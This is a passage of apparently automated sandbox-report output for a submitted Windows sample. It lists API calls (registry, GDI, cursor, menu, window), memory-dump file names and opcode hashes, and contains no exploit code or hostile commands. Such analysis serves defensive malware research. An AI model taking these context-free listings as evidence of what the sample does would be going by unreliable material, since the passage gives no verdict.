                                                                  • Instruction Fuzzy Hash: 4D218D72224202EFDB219F20DC85FA677E9BB19744F054664F849EF1B0DB71ED609B40
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 001D41DF
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001D420A
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001D4235
                                                                  • RegCloseKey.ADVAPI32(?), ref: 001D4249
                                                                  • RegCloseKey.ADVAPI32(?), ref: 001D4253
                                                                    • Part of subcall function 001D17E4: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D17F6
                                                                    • Part of subcall function 001D17E4: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 001D1806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                  • String ID: software
                                                                  • API String ID: 550756860-2010147023
                                                                  • Opcode ID: 3ff71294d6e94c3e17c2f80358016c96b3a66080e0b686e50d5600a2bf66ecd4
                                                                  • Instruction ID: 22d62fd07d7f5ffb2304e6a799a3b13578862051d35588ad43f6ae85c9ae4c15
                                                                  • Opcode Fuzzy Hash: 3ff71294d6e94c3e17c2f80358016c96b3a66080e0b686e50d5600a2bf66ecd4
                                                                  • Instruction Fuzzy Hash: 8D211871900058FB8B219B96EC88CAFBFBEEBD5700B24415BF50AA2211D7315A45DB61
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 0024BE51
                                                                    • Part of subcall function 0024BD98: __EH_prolog3.LIBCMT ref: 0024BD9F
                                                                    • Part of subcall function 0024BD98: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0024BDF7
                                                                    • Part of subcall function 0024BD98: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0024BE09
                                                                  • CopyRect.USER32(?,?), ref: 0024BE7F
                                                                  • GetCursorPos.USER32(?), ref: 0024BE91
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 0024BEA7
                                                                  • IsRectEmpty.USER32(?), ref: 0024BEC2
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 0024BED4
                                                                  • DoDragDrop.OLE32(00000000,00000000,?,00000000), ref: 0024BF2B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
                                                                  • String ID:
                                                                  • API String ID: 1837043813-0
                                                                  • Opcode ID: 9f71f3a9b1ae8134f11c6f273ffc3aed47886716e994a1633c8da2c7a1289da5
                                                                  • Instruction ID: c978074eba1c22bd6002495eb50077af36277743ed47a12b066491ce1843404d
                                                                  • Opcode Fuzzy Hash: 9f71f3a9b1ae8134f11c6f273ffc3aed47886716e994a1633c8da2c7a1289da5
                                                                  • Instruction Fuzzy Hash: 96215C72A102599BCB06EFE0CD889EEB7B9BF98700F504519EA06AB250DB70AD15DF50
                                                                  APIs
                                                                  • FillRect.USER32(?,?), ref: 001F24F0
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 001F24FE
                                                                  • PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 001F252A
                                                                  • PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 001F253F
                                                                  • PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 001F2554
                                                                  • PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 001F256A
                                                                  • FillRect.USER32(?,?), ref: 001F257F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Fill$Inflate
                                                                  • String ID:
                                                                  • API String ID: 2224923502-0
                                                                  • Opcode ID: 5a2fc5920e75c5df955b2ed64d17dd5241b32d1ca9f08817164a9538dfe1d9dd
                                                                  • Instruction ID: db6c7ac4610918459bb80cd83ec047e1ad6d6ca5c97bc424ee49230143293d37
                                                                  • Opcode Fuzzy Hash: 5a2fc5920e75c5df955b2ed64d17dd5241b32d1ca9f08817164a9538dfe1d9dd
                                                                  • Instruction Fuzzy Hash: 9E21C672500149FFDF01DF58ED89EAA7FA9FB48320F048115BE199A160C772E960DBA0
                                                                  APIs
                                                                  • RealChildWindowFromPoint.USER32(?,?,?), ref: 001D1079
                                                                  • ClientToScreen.USER32(?,?), ref: 001D1098
                                                                  • GetWindow.USER32(?,00000005), ref: 001D10FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ChildClientFromPointRealScreen
                                                                  • String ID:
                                                                  • API String ID: 2518355518-0
                                                                  • Opcode ID: a1fea06b70e29d76ba346daa47e284dd3fdd2be4a6dcf8b1d916bff3101adcee
                                                                  • Instruction ID: b7c59d511174b1a2416705637055bddc5297455b9a6411657f6216284fe2e6f0
                                                                  • Opcode Fuzzy Hash: a1fea06b70e29d76ba346daa47e284dd3fdd2be4a6dcf8b1d916bff3101adcee
                                                                  • Instruction Fuzzy Hash: 0C218076E5125ABFDB14DFA4DC49BFEB7B8EF09312F10011AF505E6240CB349A458BA1
                                                                  APIs
                                                                    • Part of subcall function 001EF3CD: __EH_prolog3_GS.LIBCMT ref: 001EF3D4
                                                                    • Part of subcall function 001EF3CD: GetWindowRect.USER32(?,?), ref: 001EF415
                                                                    • Part of subcall function 001EF3CD: CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 001EF43F
                                                                    • Part of subcall function 001EF3CD: SetWindowRgn.USER32(?,?,00000000), ref: 001EF455
                                                                  • GetSystemMenu.USER32(?,00000000), ref: 001EF9DC
                                                                  • DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 001EF9FD
                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 001EFA09
                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 001EFA15
                                                                  • EnableMenuItem.USER32(?,0000F060,00000001), ref: 001EFA2F
                                                                    • Part of subcall function 001E8497: SetRectEmpty.USER32(?), ref: 001E84CA
                                                                    • Part of subcall function 001E8497: ReleaseCapture.USER32 ref: 001E84D0
                                                                    • Part of subcall function 001E8497: SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E84DF
                                                                    • Part of subcall function 001E8497: GetCapture.USER32 ref: 001E8521
                                                                    • Part of subcall function 001E8497: ReleaseCapture.USER32 ref: 001E8531
                                                                    • Part of subcall function 001E8497: SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E8540
                                                                    • Part of subcall function 001E8497: RedrawWindow.USER32(?,?,?,00000505), ref: 001E85AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CaptureMenu$DeleteRectWindow$Release$CreateEmptyEnableH_prolog3_ItemRedrawRoundSystem
                                                                  • String ID: 4{/
                                                                  • API String ID: 2818640433-3141077306
                                                                  • Opcode ID: 2e6c8de90149e3bc52a4cbe3f7d53377dee350412eb1b06bef2ed6810f0ae128
                                                                  • Instruction ID: db5d07951dd5841060adbed58ef2172a91493c394ed40e90ce6785cb9fdef2ff
                                                                  • Opcode Fuzzy Hash: 2e6c8de90149e3bc52a4cbe3f7d53377dee350412eb1b06bef2ed6810f0ae128
                                                                  • Instruction Fuzzy Hash: 1C219031240666BFDB316F22DC8AF6EBB69EF54750F040079F9099B2A2CB719C11CB90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001D6F8D
                                                                  • GetWindowRect.USER32(?,?), ref: 001D6FB1
                                                                  • ScreenToClient.USER32(?,?), ref: 001D6FC4
                                                                  • ScreenToClient.USER32(?,?), ref: 001D6FCD
                                                                  • EqualRect.USER32(?,?), ref: 001D6FD4
                                                                  • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 001D6FFE
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 001D7008
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                  • String ID:
                                                                  • API String ID: 443303494-0
                                                                  • Opcode ID: 40ef7182e8b69cc2f745c02aeada8c8149d1f1fe17ac42856b777ec38a23ea5f
                                                                  • Instruction ID: dc97ff924ad384b05126f2c9e4ca2789535885735d767e65df2686c465ab6b42
                                                                  • Opcode Fuzzy Hash: 40ef7182e8b69cc2f745c02aeada8c8149d1f1fe17ac42856b777ec38a23ea5f
                                                                  • Instruction Fuzzy Hash: 3521E075900209AFDB11DFA5DC84DAFF7B9EF48350B20852AE955E7254EB30A900CF60
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0020EFEC
                                                                  • IsRectEmpty.USER32(?), ref: 0020F00B
                                                                  • IsRectEmpty.USER32(?), ref: 0020F018
                                                                  • GetCursorPos.USER32(00000000), ref: 0020F02A
                                                                  • ScreenToClient.USER32(?,00000000), ref: 0020F037
                                                                  • PtInRect.USER32(?,00000000,00000000), ref: 0020F04A
                                                                  • PtInRect.USER32(?,00000000,00000000), ref: 0020F05D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$ClientCursorMessageScreenSend
                                                                  • String ID:
                                                                  • API String ID: 703117857-0
                                                                  • Opcode ID: 2c8fa957b3b0760dd8aa14813b46ddfc3ad898ca29abfd901d86f378c863f0e8
                                                                  • Instruction ID: e04c4cd3a249449329e34864ac9faa7ddffb3d6b6e8a48d3ad081e9e3348fc76
                                                                  • Opcode Fuzzy Hash: 2c8fa957b3b0760dd8aa14813b46ddfc3ad898ca29abfd901d86f378c863f0e8
                                                                  • Instruction Fuzzy Hash: F221B37655030ABFDF209FA0DC48EEEBBB9EF44350F004464E545924A2DB31DA91DB10
                                                                  APIs
                                                                  • SelectObject.GDI32(?,00000000), ref: 00233552
                                                                    • Part of subcall function 001D0E38: DeleteObject.GDI32 ref: 001D0E51
                                                                  • SelectObject.GDI32(?,00000000), ref: 00233568
                                                                  • DeleteObject.GDI32(00000000), ref: 002335D3
                                                                  • DeleteDC.GDI32(00000000), ref: 002335E2
                                                                  • LeaveCriticalSection.KERNEL32(00336BF4), ref: 002335FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Delete$Select$CriticalLeaveSection
                                                                  • String ID: DR/
                                                                  • API String ID: 3849354926-2878275201
                                                                  • Opcode ID: 7390028c66008acf97fd2dc75e82cd2d8d2f7ff42dd48ba561698e7f5fd1b5f6
                                                                  • Instruction ID: 18fd7fb3b9476ddd5c2c8ed1ee2b360ed25e5de7b3c5b9468c4f799a31736f44
                                                                  • Opcode Fuzzy Hash: 7390028c66008acf97fd2dc75e82cd2d8d2f7ff42dd48ba561698e7f5fd1b5f6
                                                                  • Instruction Fuzzy Hash: 39219AB1900205AFCF02DF65DCC5999BBB9FF98310F408166E8089F262C771CA51CF90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00211E7E
                                                                  • SHAppBarMessage.SHELL32(00000007,?), ref: 00211E9C
                                                                  • SHAppBarMessage.SHELL32(00000007,?), ref: 00211EB6
                                                                  • SHAppBarMessage.SHELL32(00000007,?), ref: 00211ECC
                                                                  • SHAppBarMessage.SHELL32(00000007,?), ref: 00211EE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$_memset
                                                                  • String ID: "9!
                                                                  • API String ID: 2485647581-2254820984
                                                                  • Opcode ID: c164f76a7c8c4d2f69dc0df0a15415acf0f91db11f58268e83de7d4ddc4444d7
                                                                  • Instruction ID: e08c25f9f3060634a520e77efd499eef8d29717d8ad02d6d8598c97461857957
                                                                  • Opcode Fuzzy Hash: c164f76a7c8c4d2f69dc0df0a15415acf0f91db11f58268e83de7d4ddc4444d7
                                                                  • Instruction Fuzzy Hash: 36216F71E0120AAEE744CFA59C81FDABFACAB04354F04102AD905E6180DB71E994CFA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002B8617
                                                                  • _wcslen.LIBCMT ref: 002B861D
                                                                  • GetDC.USER32(00000000), ref: 002B864C
                                                                  • EnumFontFamiliesExW.GDI32(00000000,?,002B85B3,?,00000000,?,?,?,?,?,?,000003EE,?), ref: 002B8667
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002B866F
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EnumException@8FamiliesFontH_prolog3ReleaseThrow_memset_wcslen
                                                                  • String ID: MS UI Gothic
                                                                  • API String ID: 2708522728-1905310704
                                                                  • Opcode ID: e3596c56da77c687c9c492e289893f83d340f2895a6acb29f83378cd1ee94396
                                                                  • Instruction ID: 4e1054c5761c61a8c69aa22cf7c68a9a5348c869411e1b5687e8277be9be0b61
                                                                  • Opcode Fuzzy Hash: e3596c56da77c687c9c492e289893f83d340f2895a6acb29f83378cd1ee94396
                                                                  • Instruction Fuzzy Hash: 13018271910318ABCB10EBA49D49DEEB7BCEB45740F140019F809A7141EF209A11CBA5
                                                                  APIs
                                                                  • SetCapture.USER32(?), ref: 001F941B
                                                                  • GetCursorPos.USER32(?), ref: 001F945A
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 001F9484
                                                                  • SetCursor.USER32(00000000), ref: 001F948B
                                                                  • GetCursorPos.USER32(?), ref: 001F9498
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$CaptureLoad
                                                                  • String ID: 2
                                                                  • API String ID: 1460996051-3001879987
                                                                  • Opcode ID: 2756780dfdbe71b4fa5fa899c5a552599a603653ceebc3d86b593a01e13c724e
                                                                  • Instruction ID: a76e412430038b26984a6b1aa96dbcffe12a458ae00ab8d29f6b25f9f3be09f8
                                                                  • Opcode Fuzzy Hash: 2756780dfdbe71b4fa5fa899c5a552599a603653ceebc3d86b593a01e13c724e
                                                                  • Instruction Fuzzy Hash: 7B1182316007149FDB24AB74D80CFEA77E9AF69700F04082EF6CA87251CF75A841CB91
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001C9272
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 001C928F
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 001C9299
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                                  • String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
                                                                  • API String ID: 417325364-4287352451
                                                                  • Opcode ID: a9c82a00c0d95e643b69d222b6f5e89d0c4593d7ade39b0307e25df16702e799
                                                                  • Instruction ID: 307a307354d0794c4fc54922dbf1c73de90a30920034eb75b92ada0f71c67406
                                                                  • Opcode Fuzzy Hash: a9c82a00c0d95e643b69d222b6f5e89d0c4593d7ade39b0307e25df16702e799
                                                                  • Instruction Fuzzy Hash: 9A01B132A40219BBDB119BB6C84CFAF7AACDFA5724F110069E40597200EBB0DD40C6A1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001D833D
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 001D839A
                                                                  • GetProcAddress.KERNEL32(UnregisterTouchWindow), ref: 001D83BC
                                                                    • Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ActivateH_prolog3
                                                                  • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
